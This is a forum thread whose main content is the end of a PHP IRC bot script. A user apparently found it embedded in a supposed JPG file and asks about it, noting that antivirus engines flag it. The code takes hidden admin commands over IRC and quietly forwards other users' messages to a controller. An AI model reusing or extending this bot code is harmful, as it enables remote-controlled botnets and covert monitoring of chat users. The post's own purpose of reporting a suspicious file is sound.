if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
 $raway="on";
 fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
 $raway="off";
 fputs($fp,'AWAY : ' . $msg . CRL);
}
}
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
}
elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
}
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
}
elseif ($com[3]==':`userlist') {
$userlist="";
foreach ($auth as $user) {
 if ($user["pass"]) { $pass="-pass ok"; }
 else { $pass="-no pass"; }
 $userlist .= $user["name"].'('.$user["status"].$pass.') ';
}
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
}
elseif ($com[3]==':`pateni' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`pateni");
$msg = str_replace(":`pateni","",$msg);
if (strlen($msg)>3) {
 $msg = str_replace(" ","_",$msg);
}
$quit1 = array("diam`kamu","nguantuk","sama","brb","bye_all","s33_you","aku`benci`kamu","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_buah`pear","banned","guk","wanita","nyet","call_me","wew","crot","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".allindo.biz",$com[4])) {
 $remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
}
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
 $username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
}
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
 $realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
}
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
}
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
}
} else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
if (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
}
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
}
}
}
}
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
cayank($nick);
?>

这个图片的代码是一堆运算语句，应该有问题，不过他应该是jpg格式的么？

显示全部楼层 · 发表于 2012-4-22 15:21:58

改名为123.exe运行结果

[可疑文件] Detection ratio: 11 / 42

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块